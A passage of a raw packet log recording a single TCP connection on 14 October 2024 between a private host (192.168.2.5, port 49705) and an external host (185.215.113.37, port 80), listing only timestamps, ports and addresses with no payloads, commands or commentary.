Oct 14, 2024 01:53:20.972856998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.972876072 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.972891092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.972912073 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.972923994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.972939968 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.972963095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.972974062 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.972995996 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973016977 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973031044 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973045111 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973063946 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973083973 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973098040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973117113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973130941 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973151922 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973165035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973181009 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973197937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973216057 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973231077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973248959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973264933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973284006 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973297119 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973320961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973330021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973355055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973364115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973375082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973397970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973431110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973434925 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973455906 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973464012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973479986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973499060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973520041 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973531961 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973555088 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973588943 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973608971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973644972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973665953 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973678112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973704100 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973712921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973726988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973746061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973767042 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973779917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973803043 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973815918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:20.973831892 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:20.973869085 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.059778929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.059839964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.059864998 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.059891939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.059909105 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.059950113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.059952021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060003996 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060004950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060056925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060059071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060108900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060110092 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060143948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060169935 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060173035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060194016 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060223103 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060224056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060262918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060278893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060313940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060318947 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060347080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060365915 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060379982 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060412884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060425997 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060426950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060445070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060460091 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060478926 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060491085 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060513973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060525894 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060549021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060569048 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060578108 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060601950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060619116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060622931 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060669899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060672045 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060703039 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060723066 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060739040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060753107 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060767889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060797930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060796022 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060832024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060834885 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060856104 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060863018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060880899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060894966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060915947 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060928106 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060955048 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060961962 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.060980082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.060992956 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061019897 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061024904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061038017 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061057091 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061079979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061090946 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061104059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061121941 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061145067 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061156988 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061175108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061189890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061212063 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061223030 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061237097 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061254025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061275959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061289072 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061305046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061319113 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061338902 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061351061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061362028 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061384916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061403990 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061417103 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061436892 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061450958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061469078 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061484098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061501980 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061518908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.061537981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.061594009 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.103888988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.108930111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333481073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333530903 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333542109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333779097 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.333801031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333863974 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.333908081 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333918095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333926916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333936930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.333970070 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334003925 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334021091 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334033012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334042072 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334052086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334063053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334084034 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334120035 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334181070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334191084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334199905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334208965 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334218979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334228039 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334237099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334249973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334249973 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334268093 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334284067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334291935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334301949 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334310055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334310055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334310055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334312916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334336996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334371090 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334408998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334419012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334429026 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334434032 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334460020 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334494114 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334503889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334515095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334523916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334532976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334562063 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334595919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334614038 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334624052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334634066 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334644079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334654093 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334664106 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334664106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334676027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334685087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334702015 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334738970 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334759951 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334770918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334779024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334791899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334801912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334811926 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334816933 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334871054 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334871054 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334893942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334903955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334925890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334935904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334945917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334955931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.334955931 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.334979057 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335010052 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335109949 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335119963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335129023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335139036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335155964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335166931 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335174084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335186005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335190058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335196972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335211039 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335247040 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335284948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335295916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335304976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335314989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335340977 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335370064 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335377932 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335438967 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335505962 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335515976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335525990 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335536003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335545063 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335555077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335571051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335606098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335694075 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335704088 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335712910 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335721970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335731983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335750103 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335787058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335787058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335833073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335844994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335864067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335872889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335881948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335891008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335896969 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335901022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335911989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335922003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335931063 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.335933924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335952997 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.335979939 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336009979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336019993 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336029053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336067915 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336158991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336169004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336177111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336185932 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336195946 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336205006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336215019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336220980 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336225033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336236000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336245060 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336246014 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336257935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336266994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336267948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336288929 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336302042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336307049 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336313963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336323977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336333036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336342096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336352110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336361885 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336361885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336374044 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336384058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336385012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336395025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336404085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336406946 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336425066 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336445093 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336855888 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336865902 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336875916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336884022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.336929083 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.336929083 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.424252033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.424304008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.424313068 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.424362898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.424374104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.424385071 CEST	80	49705	185.215.113.37	192.168.2.5
